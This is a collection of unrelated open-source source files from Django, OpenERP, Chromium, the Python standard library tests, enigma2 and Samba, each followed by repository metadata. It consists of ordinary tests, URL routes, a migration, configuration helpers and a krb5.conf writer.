assert_does_not_contain('Assignment to review', response.body)
assert_contains('Sorry, there are no new submissions ', response.body)
actions.logout()
# The admin assigns the student to review his own work.
actions.login(email, is_admin=True)
response = actions.add_reviewer(
self, LEGACY_REVIEW_UNIT_ID, email, email)
assert_equals(response.status_int, 302)
response = self.get(response.location)
assert_does_not_contain(
'Error 412: The reviewer is already assigned', response.body)
assert_contains('First answer to Q1', response.body)
assert_contains(
'Review 1 from [email protected]', response.body)
# The admin repeats the 'add reviewer' action. This should fail.
response = actions.add_reviewer(
self, LEGACY_REVIEW_UNIT_ID, email, email)
assert_equals(response.status_int, 302)
response = self.get(response.location)
assert_contains(
'Error 412: The reviewer is already assigned', response.body)
class PeerReviewDashboardStudentTest(actions.TestBase):
"""Test peer review dashboard from the Student perspective."""
COURSE_NAME = 'back_button_top_level'
STUDENT_EMAIL = '[email protected]'
def setUp(self):
super(PeerReviewDashboardStudentTest, self).setUp()
self.base = '/' + self.COURSE_NAME
context = actions.simple_add_course(
self.COURSE_NAME, '[email protected]', 'Peer Back Button Child')
self.course = courses.Course(None, context)
self.assessment = self.course.add_assessment()
self.assessment.title = 'Assessment'
self.assessment.html_content = 'assessment content'
self.assessment.workflow_yaml = (
'{grader: human,'
'matcher: peer,'
'review_due_date: \'2034-07-01 12:00\','
'review_min_count: 1,'
'review_window_mins: 20,'
'submission_due_date: \'2034-07-01 12:00\'}')
self.assessment.now_available = True
self.course.save()
actions.login(self.STUDENT_EMAIL)
actions.register(self, self.STUDENT_EMAIL)
config.Registry.test_overrides[
utils.CAN_PERSIST_ACTIVITY_EVENTS.name] = True
actions.submit_assessment(
self,
self.assessment.unit_id,
{'answers': '', 'score': 0,
'assessment_type': self.assessment.unit_id},
presubmit_checks=False
)
def test_back_button_top_level_assessment(self):
response = self.get('reviewdashboard?unit=%s' % str(
self.assessment.unit_id))
back_button = self.parse_html_string(response.body).find(
'.//*[@href="assessment?name=%s"]' % self.assessment.unit_id)
self.assertIsNotNone(back_button)
self.assertEquals(back_button.text, 'Back to assignment')
def test_back_button_child_assessment(self):
parent_unit = self.course.add_unit()
parent_unit.title = 'No Lessons'
parent_unit.now_available = True
parent_unit.pre_assessment = self.assessment.unit_id
self.course.save()
response = self.get('reviewdashboard?unit=%s' % str(
self.assessment.unit_id))
back_button = self.parse_html_string(response.body).find(
'.//*[@href="unit?unit=%s&assessment=%s"]' % (
parent_unit.unit_id, self.assessment.unit_id))
self.assertIsNotNone(back_button)
self.assertEquals(back_button.text, 'Back to assignment')
| apache-2.0 | 4,509,567,241,261,761,000 | 40.546985 | 80 | 0.610843 | false |
MBoustani/GeoParser | geoparser_app/urls.py | 3 | 2166 | from django.conf.urls import patterns, url
from . import views
urlpatterns = patterns('geoparser_app.views',
url(r'^$', views.index, name='index'),
url(r'^extract_text/(?P<file_name>\S+)$', views.extract_text, name='extract_text'),
url(r'^find_location/(?P<file_name>\S+)', views.find_location, name='find_location'),
url(r'^find_latlon/(?P<file_name>\S+)', views.find_latlon, name='find_latlon'),
url(r'^return_points/(?P<file_name>\S+)/(?P<core_name>\S+)', views.return_points, name='return_points'),
url(r'^return_points_khooshe/(?P<indexed_path>\S+)/(?P<domain_name>\S+)', views.return_points_khooshe, name='return_points_khooshe'),
url(r'^refresh_khooshe_tiles/(?P<indexed_path>\S+)/(?P<domain_name>\S+)', views.refresh_khooshe_tiles, name='refresh_khooshe_tiles'),
url(r'^set_idx_fields_for_popup/(?P<indexed_path>\S+)/(?P<domain_name>\S+)/(?P<index_field_csv>\S+)', views.set_idx_fields_for_popup, name='set_idx_fields_for_popup'),
url(r'^get_idx_fields_for_popup/(?P<indexed_path>\S+)/(?P<domain_name>\S+)', views.get_idx_fields_for_popup, name='get_idx_fields_for_popup'),
url(r'list_of_uploaded_files$', views.list_of_uploaded_files, name='list_of_uploaded_files'),
url(r'index_file/(?P<file_name>\S+)$', views.index_file, name='index_file'),
url(r'query_crawled_index/(?P<indexed_path>\S+)/(?P<domain_name>\S+)$', views.query_crawled_index, name='query_crawled_index'),
url(r'add_crawled_index/(?P<indexed_path>\S+)/(?P<domain_name>\S+)/(?P<username>\S+)/(?P<passwd>\S+)$', views.add_crawled_index, name='add_crawled_index'),
url(r'list_of_domains/$', views.list_of_domains, name='list_of_domains'),
url(r'search_crawled_index/(?P<indexed_path>\S+)/(?P<domain_name>\S+)/(?P<keyword>\S+)$', views.search_crawled_index, name='search_crawled_index'),
url(r'list_of_searched_tiles/$', views.list_of_searched_tiles, name='list_of_searched_tiles'),
url(r'remove_khooshe_tile/(?P<tiles_path>\S+)/(?P<khooshe_folder>\S+)$', views.remove_khooshe_tile, name='remove_khooshe_tile'),
url(r'remove_uploaded_file/(?P<file_name>\S+)$', views.remove_uploaded_file, name='remove_uploaded_file'),
) | apache-2.0 | -6,716,810,178,570,947,000 | 85.68 | 171 | 0.668052 | false |
RaoUmer/django | tests/regressiontests/utils/datastructures.py | 7 | 10672 | """
Tests for stuff in django.utils.datastructures.
"""
import copy
import pickle
import warnings
from django.test import SimpleTestCase
from django.utils.datastructures import (DictWrapper, ImmutableList,
MultiValueDict, MultiValueDictKeyError, MergeDict, SortedDict)
from django.utils import six
class SortedDictTests(SimpleTestCase):
def setUp(self):
self.d1 = SortedDict()
self.d1[7] = 'seven'
self.d1[1] = 'one'
self.d1[9] = 'nine'
self.d2 = SortedDict()
self.d2[1] = 'one'
self.d2[9] = 'nine'
self.d2[0] = 'nil'
self.d2[7] = 'seven'
def test_basic_methods(self):
self.assertEqual(list(six.iterkeys(self.d1)), [7, 1, 9])
self.assertEqual(list(six.itervalues(self.d1)), ['seven', 'one', 'nine'])
self.assertEqual(list(six.iteritems(self.d1)), [(7, 'seven'), (1, 'one'), (9, 'nine')])
def test_overwrite_ordering(self):
""" Overwriting an item keeps its place. """
self.d1[1] = 'ONE'
self.assertEqual(list(six.itervalues(self.d1)), ['seven', 'ONE', 'nine'])
def test_append_items(self):
""" New items go to the end. """
self.d1[0] = 'nil'
self.assertEqual(list(six.iterkeys(self.d1)), [7, 1, 9, 0])
def test_delete_and_insert(self):
"""
Deleting an item, then inserting the same key again will place it
at the end.
"""
del self.d2[7]
self.assertEqual(list(six.iterkeys(self.d2)), [1, 9, 0])
self.d2[7] = 'lucky number 7'
self.assertEqual(list(six.iterkeys(self.d2)), [1, 9, 0, 7])
if not six.PY3:
def test_change_keys(self):
"""
Changing the keys won't do anything, it's only a copy of the
keys dict.
This test doesn't make sense under Python 3 because keys is
an iterator.
"""
k = self.d2.keys()
k.remove(9)
self.assertEqual(self.d2.keys(), [1, 9, 0, 7])
def test_init_keys(self):
"""
        Initialising a SortedDict with a duplicate key keeps a single entry.
        As with a real dict, the value from the later occurrence wins, but the
        ordering is taken from where the key was first seen.
"""
tuples = ((2, 'two'), (1, 'one'), (2, 'second-two'))
d = SortedDict(tuples)
self.assertEqual(list(six.iterkeys(d)), [2, 1])
real_dict = dict(tuples)
self.assertEqual(sorted(six.itervalues(real_dict)), ['one', 'second-two'])
# Here the order of SortedDict values *is* what we are testing
self.assertEqual(list(six.itervalues(d)), ['second-two', 'one'])
def test_overwrite(self):
self.d1[1] = 'not one'
self.assertEqual(self.d1[1], 'not one')
self.assertEqual(list(six.iterkeys(self.d1)), list(six.iterkeys(self.d1.copy())))
def test_append(self):
self.d1[13] = 'thirteen'
self.assertEqual(
repr(self.d1),
"{7: 'seven', 1: 'one', 9: 'nine', 13: 'thirteen'}"
)
def test_pop(self):
self.assertEqual(self.d1.pop(1, 'missing'), 'one')
self.assertEqual(self.d1.pop(1, 'missing'), 'missing')
# We don't know which item will be popped in popitem(), so we'll
# just check that the number of keys has decreased.
l = len(self.d1)
self.d1.popitem()
self.assertEqual(l - len(self.d1), 1)
def test_dict_equality(self):
d = SortedDict((i, i) for i in range(3))
self.assertEqual(d, {0: 0, 1: 1, 2: 2})
def test_tuple_init(self):
d = SortedDict(((1, "one"), (0, "zero"), (2, "two")))
self.assertEqual(repr(d), "{1: 'one', 0: 'zero', 2: 'two'}")
def test_pickle(self):
self.assertEqual(
pickle.loads(pickle.dumps(self.d1, 2)),
{7: 'seven', 1: 'one', 9: 'nine'}
)
def test_copy(self):
orig = SortedDict(((1, "one"), (0, "zero"), (2, "two")))
copied = copy.copy(orig)
self.assertEqual(list(six.iterkeys(orig)), [1, 0, 2])
self.assertEqual(list(six.iterkeys(copied)), [1, 0, 2])
def test_clear(self):
self.d1.clear()
self.assertEqual(self.d1, {})
self.assertEqual(self.d1.keyOrder, [])
def test_insert(self):
d = SortedDict()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
d.insert(0, "hello", "world")
assert w[0].category is PendingDeprecationWarning
def test_value_for_index(self):
d = SortedDict({"a": 3})
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.assertEqual(d.value_for_index(0), 3)
assert w[0].category is PendingDeprecationWarning
class MergeDictTests(SimpleTestCase):
def test_simple_mergedict(self):
d1 = {'chris':'cool', 'camri':'cute', 'cotton':'adorable',
'tulip':'snuggable', 'twoofme':'firstone'}
d2 = {'chris2':'cool2', 'camri2':'cute2', 'cotton2':'adorable2',
'tulip2':'snuggable2'}
d3 = {'chris3':'cool3', 'camri3':'cute3', 'cotton3':'adorable3',
'tulip3':'snuggable3'}
d4 = {'twoofme': 'secondone'}
md = MergeDict(d1, d2, d3)
self.assertEqual(md['chris'], 'cool')
self.assertEqual(md['camri'], 'cute')
self.assertEqual(md['twoofme'], 'firstone')
md2 = md.copy()
self.assertEqual(md2['chris'], 'cool')
def test_mergedict_merges_multivaluedict(self):
""" MergeDict can merge MultiValueDicts """
multi1 = MultiValueDict({'key1': ['value1'],
'key2': ['value2', 'value3']})
multi2 = MultiValueDict({'key2': ['value4'],
'key4': ['value5', 'value6']})
mm = MergeDict(multi1, multi2)
# Although 'key2' appears in both dictionaries,
# only the first value is used.
self.assertEqual(mm.getlist('key2'), ['value2', 'value3'])
self.assertEqual(mm.getlist('key4'), ['value5', 'value6'])
self.assertEqual(mm.getlist('undefined'), [])
self.assertEqual(sorted(six.iterkeys(mm)), ['key1', 'key2', 'key4'])
self.assertEqual(len(list(six.itervalues(mm))), 3)
self.assertTrue('value1' in six.itervalues(mm))
self.assertEqual(sorted(six.iteritems(mm), key=lambda k: k[0]),
[('key1', 'value1'), ('key2', 'value3'),
('key4', 'value6')])
self.assertEqual([(k,mm.getlist(k)) for k in sorted(mm)],
[('key1', ['value1']),
('key2', ['value2', 'value3']),
('key4', ['value5', 'value6'])])
class MultiValueDictTests(SimpleTestCase):
def test_multivaluedict(self):
d = MultiValueDict({'name': ['Adrian', 'Simon'],
'position': ['Developer']})
self.assertEqual(d['name'], 'Simon')
self.assertEqual(d.get('name'), 'Simon')
self.assertEqual(d.getlist('name'), ['Adrian', 'Simon'])
self.assertEqual(list(six.iteritems(d)),
[('position', 'Developer'), ('name', 'Simon')])
self.assertEqual(list(six.iterlists(d)),
[('position', ['Developer']),
('name', ['Adrian', 'Simon'])])
# MultiValueDictKeyError: "Key 'lastname' not found in
# <MultiValueDict: {'position': ['Developer'],
# 'name': ['Adrian', 'Simon']}>"
self.assertRaisesMessage(MultiValueDictKeyError,
'"Key \'lastname\' not found in <MultiValueDict: {\'position\':'\
' [\'Developer\'], \'name\': [\'Adrian\', \'Simon\']}>"',
d.__getitem__, 'lastname')
self.assertEqual(d.get('lastname'), None)
self.assertEqual(d.get('lastname', 'nonexistent'), 'nonexistent')
self.assertEqual(d.getlist('lastname'), [])
self.assertEqual(d.getlist('doesnotexist', ['Adrian', 'Simon']),
['Adrian', 'Simon'])
d.setlist('lastname', ['Holovaty', 'Willison'])
self.assertEqual(d.getlist('lastname'), ['Holovaty', 'Willison'])
self.assertEqual(list(six.itervalues(d)),
['Developer', 'Simon', 'Willison'])
def test_appendlist(self):
d = MultiValueDict()
d.appendlist('name', 'Adrian')
d.appendlist('name', 'Simon')
self.assertEqual(d.getlist('name'), ['Adrian', 'Simon'])
def test_copy(self):
for copy_func in [copy.copy, lambda d: d.copy()]:
d1 = MultiValueDict({
"developers": ["Carl", "Fred"]
})
self.assertEqual(d1["developers"], "Fred")
d2 = copy_func(d1)
d2.update({"developers": "Groucho"})
self.assertEqual(d2["developers"], "Groucho")
self.assertEqual(d1["developers"], "Fred")
d1 = MultiValueDict({
"key": [[]]
})
self.assertEqual(d1["key"], [])
d2 = copy_func(d1)
d2["key"].append("Penguin")
self.assertEqual(d1["key"], ["Penguin"])
self.assertEqual(d2["key"], ["Penguin"])
def test_dict_translation(self):
mvd = MultiValueDict({
'devs': ['Bob', 'Joe'],
'pm': ['Rory'],
})
d = mvd.dict()
self.assertEqual(list(six.iterkeys(d)), list(six.iterkeys(mvd)))
for key in six.iterkeys(mvd):
self.assertEqual(d[key], mvd[key])
self.assertEqual({}, MultiValueDict().dict())
class ImmutableListTests(SimpleTestCase):
def test_sort(self):
d = ImmutableList(range(10))
# AttributeError: ImmutableList object is immutable.
self.assertRaisesMessage(AttributeError,
'ImmutableList object is immutable.', d.sort)
self.assertEqual(repr(d), '(0, 1, 2, 3, 4, 5, 6, 7, 8, 9)')
def test_custom_warning(self):
d = ImmutableList(range(10), warning="Object is immutable!")
self.assertEqual(d[1], 1)
# AttributeError: Object is immutable!
self.assertRaisesMessage(AttributeError,
'Object is immutable!', d.__setitem__, 1, 'test')
class DictWrapperTests(SimpleTestCase):
def test_dictwrapper(self):
f = lambda x: "*%s" % x
d = DictWrapper({'a': 'a'}, f, 'xx_')
self.assertEqual("Normal: %(a)s. Modified: %(xx_a)s" % d,
'Normal: a. Modified: *a')
| bsd-3-clause | -565,376,974,323,611,140 | 34.45515 | 95 | 0.545352 | false |
willharris/django | tests/sites_framework/migrations/0001_initial.py | 99 | 1649 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='CustomArticle',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=50)),
('places_this_article_should_appear', models.ForeignKey(to='sites.Site')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ExclusiveArticle',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=50)),
('site', models.ForeignKey(to='sites.Site')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
migrations.CreateModel(
name='SyndicatedArticle',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=50)),
('sites', models.ManyToManyField(to='sites.Site')),
],
options={
'abstract': False,
},
bases=(models.Model,),
),
]
| bsd-3-clause | -12,916,931,738,349,056 | 31.98 | 114 | 0.502729 | false |
colinligertwood/odoo | addons/account_sequence/account_sequence_installer.py | 39 | 3904 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class account_sequence_installer(osv.osv_memory):
_name = 'account.sequence.installer'
_inherit = 'res.config.installer'
_columns = {
'name': fields.char('Name',size=64, required=True),
'prefix': fields.char('Prefix',size=64, help="Prefix value of the record for the sequence"),
'suffix': fields.char('Suffix',size=64, help="Suffix value of the record for the sequence"),
'number_next': fields.integer('Next Number', required=True, help="Next number of this sequence"),
'number_increment': fields.integer('Increment Number', required=True, help="The next number of the sequence will be incremented by this number"),
'padding' : fields.integer('Number padding', required=True, help="OpenERP will automatically adds some '0' on the left of the 'Next Number' to get the required padding size."),
'company_id': fields.many2one('res.company', 'Company'),
}
_defaults = {
'company_id': lambda s,cr,uid,c: s.pool.get('res.company')._company_default_get(cr, uid, 'ir.sequence', context=c),
'number_increment': 1,
'number_next': 1,
'padding' : 0,
'name': 'Internal Sequence Journal',
}
def execute(self, cr, uid, ids, context=None):
if context is None:
context = {}
record = self.browse(cr, uid, ids, context=context)[0]
j_ids = []
if record.company_id:
company_id = record.company_id.id,
search_criteria = [('company_id', '=', company_id)]
else:
company_id = False
search_criteria = []
vals = {
'id': 'internal_sequence_journal',
'code': 'account.journal',
'name': record.name,
'prefix': record.prefix,
'suffix': record.suffix,
'number_next': record.number_next,
'number_increment': record.number_increment,
'padding' : record.padding,
'company_id': company_id,
}
obj_sequence = self.pool.get('ir.sequence')
ir_seq = obj_sequence.create(cr, uid, vals, context)
res = super(account_sequence_installer, self).execute(cr, uid, ids, context=context)
jou_obj = self.pool.get('account.journal')
journal_ids = jou_obj.search(cr, uid, search_criteria, context=context)
for journal in jou_obj.browse(cr, uid, journal_ids, context=context):
if not journal.internal_sequence_id:
j_ids.append(journal.id)
if j_ids:
jou_obj.write(cr, uid, j_ids, {'internal_sequence_id': ir_seq})
ir_values_obj = self.pool.get('ir.values')
ir_values_obj.set(cr, uid, key='default', key2=False, name='internal_sequence_id', models =[('account.journal', False)], value=ir_seq)
return res
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 5,997,102,660,266,903,000 | 46.036145 | 184 | 0.604252 | false |
sudosurootdev/external_chromium_org | tools/auto_bisect/PRESUBMIT.py | 25 | 3243 | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Top-level presubmit script for auto-bisect.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts for
details on the presubmit API.
"""
import imp
import subprocess
import os
# Paths to bisect config files relative to src/tools.
CONFIG_FILES = [
'auto_bisect/config.cfg',
'run-perf-test.cfg'
]
def CheckChangeOnUpload(input_api, output_api):
return _CommonChecks(input_api, output_api)
def CheckChangeOnCommit(input_api, output_api):
return _CommonChecks(input_api, output_api)
def _CommonChecks(input_api, output_api):
"""Does all presubmit checks for auto-bisect."""
results = []
results.extend(_CheckAllConfigFiles(input_api, output_api))
results.extend(_RunUnitTests(input_api, output_api))
results.extend(_RunPyLint(input_api, output_api))
return results
def _CheckAllConfigFiles(input_api, output_api):
"""Checks all bisect config files and returns a list of presubmit results."""
results = []
for f in input_api.AffectedFiles():
for config_file in CONFIG_FILES:
if f.LocalPath().endswith(config_file):
results.extend(_CheckConfigFile(config_file, output_api))
return results
def _CheckConfigFile(file_path, output_api):
"""Checks one bisect config file and returns a list of presubmit results."""
try:
config_file = imp.load_source('config', file_path)
except IOError as e:
warning = 'Failed to read config file %s: %s' % (file_path, str(e))
return [output_api.PresubmitError(warning, items=[file_path])]
  if not hasattr(config_file, 'config'):
    warning = 'Config file has no "config" global variable: %s' % file_path
return [output_api.PresubmitError(warning, items=[file_path])]
if type(config_file.config) is not dict:
warning = 'Config file "config" global variable is not dict: %s' % str(e)
return [output_api.PresubmitError(warning, items=[file_path])]
for k, v in config_file.config.iteritems():
if v != '':
warning = 'Non-empty value in config dict: %s: %s' % (repr(k), repr(v))
warning += ('\nThe bisection config file should only contain a config '
'dict with empty fields. Changes to this file should not '
'be submitted.')
return [output_api.PresubmitError(warning, items=[file_path])]
return []
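# For reference (the key names below are made up for illustration), a config
# file that passes this check is a bare dict whose values are all empty
# strings:
#
#   config = {
#       'command': '',
#       'good_revision': '',
#       'bad_revision': '',
#   }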
def _RunUnitTests(input_api, output_api):
"""Runs unit tests for auto-bisect."""
repo_root = input_api.change.RepositoryRoot()
auto_bisect_dir = os.path.join(repo_root, 'tools', 'auto_bisect')
test_runner = os.path.join(auto_bisect_dir, 'run_tests')
return_code = subprocess.call(['python', test_runner])
if return_code:
message = 'Auto-bisect unit tests did not all pass.'
return [output_api.PresubmitError(message)]
return []
def _RunPyLint(input_api, output_api):
"""Runs unit tests for auto-bisect."""
telemetry_path = os.path.join(
input_api.PresubmitLocalPath(), os.path.pardir, 'telemetry')
tests = input_api.canned_checks.GetPylint(
input_api, output_api, extra_paths_list=[telemetry_path])
return input_api.RunTests(tests)
| bsd-3-clause | -1,022,108,640,698,142,100 | 33.870968 | 79 | 0.699352 | false |
cnsoft/kbengine-cocos2dx | kbe/res/scripts/common/Lib/test/test_pipes.py | 54 | 7175 | import pipes
import os
import string
import unittest
from test.support import TESTFN, run_unittest, unlink, reap_children
if os.name != 'posix':
raise unittest.SkipTest('pipes module only works on posix')
TESTFN2 = TESTFN + "2"
# tr a-z A-Z is not portable, so make the ranges explicit
s_command = 'tr %s %s' % (string.ascii_lowercase, string.ascii_uppercase)
class SimplePipeTests(unittest.TestCase):
def tearDown(self):
for f in (TESTFN, TESTFN2):
unlink(f)
def testSimplePipe1(self):
t = pipes.Template()
t.append(s_command, pipes.STDIN_STDOUT)
f = t.open(TESTFN, 'w')
f.write('hello world #1')
f.close()
with open(TESTFN) as f:
self.assertEqual(f.read(), 'HELLO WORLD #1')
def testSimplePipe2(self):
with open(TESTFN, 'w') as f:
f.write('hello world #2')
t = pipes.Template()
t.append(s_command + ' < $IN > $OUT', pipes.FILEIN_FILEOUT)
t.copy(TESTFN, TESTFN2)
with open(TESTFN2) as f:
self.assertEqual(f.read(), 'HELLO WORLD #2')
def testSimplePipe3(self):
with open(TESTFN, 'w') as f:
f.write('hello world #2')
t = pipes.Template()
t.append(s_command + ' < $IN', pipes.FILEIN_STDOUT)
f = t.open(TESTFN, 'r')
try:
self.assertEqual(f.read(), 'HELLO WORLD #2')
finally:
f.close()
def testEmptyPipeline1(self):
# copy through empty pipe
d = 'empty pipeline test COPY'
with open(TESTFN, 'w') as f:
f.write(d)
with open(TESTFN2, 'w') as f:
f.write('')
t=pipes.Template()
t.copy(TESTFN, TESTFN2)
with open(TESTFN2) as f:
self.assertEqual(f.read(), d)
def testEmptyPipeline2(self):
# read through empty pipe
d = 'empty pipeline test READ'
with open(TESTFN, 'w') as f:
f.write(d)
t=pipes.Template()
f = t.open(TESTFN, 'r')
try:
self.assertEqual(f.read(), d)
finally:
f.close()
def testEmptyPipeline3(self):
# write through empty pipe
d = 'empty pipeline test WRITE'
t = pipes.Template()
with t.open(TESTFN, 'w') as f:
f.write(d)
with open(TESTFN) as f:
self.assertEqual(f.read(), d)
def testQuoting(self):
safeunquoted = string.ascii_letters + string.digits + '@%_-+=:,./'
unicode_sample = '\xe9\xe0\xdf' # e + acute accent, a + grave, sharp s
unsafe = '"`$\\!' + unicode_sample
self.assertEqual(pipes.quote(''), "''")
self.assertEqual(pipes.quote(safeunquoted), safeunquoted)
self.assertEqual(pipes.quote('test file name'), "'test file name'")
for u in unsafe:
self.assertEqual(pipes.quote('test%sname' % u),
"'test%sname'" % u)
for u in unsafe:
self.assertEqual(pipes.quote("test%s'name'" % u),
"'test%s'\"'\"'name'\"'\"''" % u)
def testRepr(self):
t = pipes.Template()
self.assertEqual(repr(t), "<Template instance, steps=[]>")
t.append('tr a-z A-Z', pipes.STDIN_STDOUT)
self.assertEqual(repr(t),
"<Template instance, steps=[('tr a-z A-Z', '--')]>")
def testSetDebug(self):
t = pipes.Template()
t.debug(False)
self.assertEqual(t.debugging, False)
t.debug(True)
self.assertEqual(t.debugging, True)
def testReadOpenSink(self):
# check calling open('r') on a pipe ending with
# a sink raises ValueError
t = pipes.Template()
t.append('boguscmd', pipes.SINK)
self.assertRaises(ValueError, t.open, 'bogusfile', 'r')
def testWriteOpenSource(self):
# check calling open('w') on a pipe ending with
# a source raises ValueError
t = pipes.Template()
t.prepend('boguscmd', pipes.SOURCE)
self.assertRaises(ValueError, t.open, 'bogusfile', 'w')
def testBadAppendOptions(self):
t = pipes.Template()
# try a non-string command
self.assertRaises(TypeError, t.append, 7, pipes.STDIN_STDOUT)
# try a type that isn't recognized
self.assertRaises(ValueError, t.append, 'boguscmd', 'xx')
# shouldn't be able to append a source
self.assertRaises(ValueError, t.append, 'boguscmd', pipes.SOURCE)
# check appending two sinks
t = pipes.Template()
t.append('boguscmd', pipes.SINK)
self.assertRaises(ValueError, t.append, 'boguscmd', pipes.SINK)
# command needing file input but with no $IN
t = pipes.Template()
self.assertRaises(ValueError, t.append, 'boguscmd $OUT',
pipes.FILEIN_FILEOUT)
t = pipes.Template()
self.assertRaises(ValueError, t.append, 'boguscmd',
pipes.FILEIN_STDOUT)
# command needing file output but with no $OUT
t = pipes.Template()
self.assertRaises(ValueError, t.append, 'boguscmd $IN',
pipes.FILEIN_FILEOUT)
t = pipes.Template()
self.assertRaises(ValueError, t.append, 'boguscmd',
pipes.STDIN_FILEOUT)
def testBadPrependOptions(self):
t = pipes.Template()
# try a non-string command
self.assertRaises(TypeError, t.prepend, 7, pipes.STDIN_STDOUT)
# try a type that isn't recognized
self.assertRaises(ValueError, t.prepend, 'tr a-z A-Z', 'xx')
# shouldn't be able to prepend a sink
self.assertRaises(ValueError, t.prepend, 'boguscmd', pipes.SINK)
# check prepending two sources
t = pipes.Template()
t.prepend('boguscmd', pipes.SOURCE)
self.assertRaises(ValueError, t.prepend, 'boguscmd', pipes.SOURCE)
# command needing file input but with no $IN
t = pipes.Template()
self.assertRaises(ValueError, t.prepend, 'boguscmd $OUT',
pipes.FILEIN_FILEOUT)
t = pipes.Template()
self.assertRaises(ValueError, t.prepend, 'boguscmd',
pipes.FILEIN_STDOUT)
# command needing file output but with no $OUT
t = pipes.Template()
self.assertRaises(ValueError, t.prepend, 'boguscmd $IN',
pipes.FILEIN_FILEOUT)
t = pipes.Template()
self.assertRaises(ValueError, t.prepend, 'boguscmd',
pipes.STDIN_FILEOUT)
def testBadOpenMode(self):
t = pipes.Template()
self.assertRaises(ValueError, t.open, 'bogusfile', 'x')
def testClone(self):
t = pipes.Template()
t.append('tr a-z A-Z', pipes.STDIN_STDOUT)
u = t.clone()
self.assertNotEqual(id(t), id(u))
self.assertEqual(t.steps, u.steps)
self.assertNotEqual(id(t.steps), id(u.steps))
self.assertEqual(t.debugging, u.debugging)
def test_main():
run_unittest(SimplePipeTests)
reap_children()
if __name__ == "__main__":
test_main()
| lgpl-3.0 | -6,913,531,561,075,049,000 | 33.004739 | 79 | 0.569338 | false |
schleichdi2/openpli-e2 | lib/python/Components/Converter/ServiceName.py | 24 | 1939 | # -*- coding: utf-8 -*-
from Components.Converter.Converter import Converter
from enigma import iServiceInformation, iPlayableService, iPlayableServicePtr, eServiceReference
from ServiceReference import resolveAlternate
from Components.Element import cached
class ServiceName(Converter, object):
NAME = 0
PROVIDER = 1
REFERENCE = 2
EDITREFERENCE = 3
NUMBER = 4
def __init__(self, type):
Converter.__init__(self, type)
if type == "Provider":
self.type = self.PROVIDER
elif type == "Reference":
self.type = self.REFERENCE
elif type == "EditReference":
self.type = self.EDITREFERENCE
elif type == "Number":
self.type = self.NUMBER
else:
self.type = self.NAME
@cached
def getText(self):
service = self.source.service
if isinstance(service, iPlayableServicePtr):
info = service and service.info()
ref = None
else: # reference
info = service and self.source.info
ref = service
if not info:
return ""
if self.type == self.NAME:
name = ref and info.getName(ref)
if name is None:
name = info.getName()
return name.replace('\xc2\x86', '').replace('\xc2\x87', '')
elif self.type == self.PROVIDER:
return info.getInfoString(iServiceInformation.sProvider)
elif self.type == self.REFERENCE or self.type == self.EDITREFERENCE and hasattr(self.source, "editmode") and self.source.editmode:
if not ref:
return info.getInfoString(iServiceInformation.sServiceref)
nref = resolveAlternate(ref)
if nref:
ref = nref
return ref.toString()
elif self.type == self.NUMBER:
if not ref:
ref = eServiceReference(info.getInfoString(iServiceInformation.sServiceref))
num = ref and ref.getChannelNum() or None
if num is None:
num = '---'
else:
num = str(num)
return num
text = property(getText)
def changed(self, what):
if what[0] != self.CHANGED_SPECIFIC or what[1] in (iPlayableService.evStart,):
Converter.changed(self, what)
| gpl-2.0 | 7,645,101,249,338,529,000 | 27.940299 | 132 | 0.700877 | false |
sYnfo/samba | selftest/target/samba.py | 1 | 4169 | #!/usr/bin/perl
# Bootstrap Samba and run a number of tests against it.
# Copyright (C) 2005-2012 Jelmer Vernooij <[email protected]>
# Published under the GNU GPL, v3 or later.
from __future__ import absolute_import
import os
import sys
def bindir_path(bindir, path):
"""Find the executable to use.
:param bindir: Directory with binaries
:param path: Name of the executable to run
:return: Full path to the executable to run
"""
valpath = os.path.join(bindir, path)
if os.path.isfile(valpath):
return valpath
return path
def mk_realms_stanza(realm, dnsname, domain, kdc_ipv4):
"""Create a realms stanza for use in a krb5.conf file.
    :param realm: Realm name
:param dnsname: DNS name matching the realm
:param domain: Domain name
:param kdc_ipv4: IPv4 address of the KDC
:return: String with stanza
"""
return """\
%(realm)s = {
kdc = %(kdc_ipv4)s:88
admin_server = %(kdc_ipv4)s:88
default_domain = %(dnsname)s
}
%(dnsname)s = {
kdc = %(kdc_ipv4)s:88
admin_server = %(kdc_ipv4)s:88
default_domain = %(dnsname)s
}
%(domain)s = {
kdc = %(kdc_ipv4)s:88
admin_server = %(kdc_ipv4)s:88
default_domain = %(dnsname)s
}
""" % {
"kdc_ipv4": kdc_ipv4, "dnsname": dnsname, "realm": realm, "domain": domain}
def write_krb5_conf(f, realm, dnsname, domain, kdc_ipv4, tlsdir=None,
other_realms_stanza=None):
"""Write a krb5.conf file.
:param f: File-like object to write to
:param realm: Realm
:param dnsname: DNS domain name
:param domain: Domain name
:param kdc_ipv4: IPv4 address of KDC
:param tlsdir: Optional TLS directory
